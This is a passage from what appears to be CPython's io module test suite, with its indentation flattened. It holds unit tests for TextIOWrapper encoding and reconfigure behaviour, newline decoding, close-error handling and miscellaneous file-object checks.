txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
        # but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
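# Rough illustration (added comment, not in the original file): _to_memoryview
# keeps only a whole number of array items, so assuming the usual 4-byte 'i'
# itemsize, _to_memoryview(b'abcdefghij').tobytes() == b'abcdefgh' -- the two
# trailing bytes that do not fill an item are dropped.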
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
        # default chunk size is 8192 bytes, so t doesn't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
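# Quick reference (illustrative comment, not part of the original tests): with
# translate=True the decoder holds a trailing '\r' until it can tell whether a
# '\n' follows, e.g.
#     dec = io.IncrementalNewlineDecoder(codecs.getincrementaldecoder('utf-8')(), translate=True)
#     dec.decode(b'a\r')              -> 'a'
#     dec.decode(b'\nb', final=True)  -> '\nb'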
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
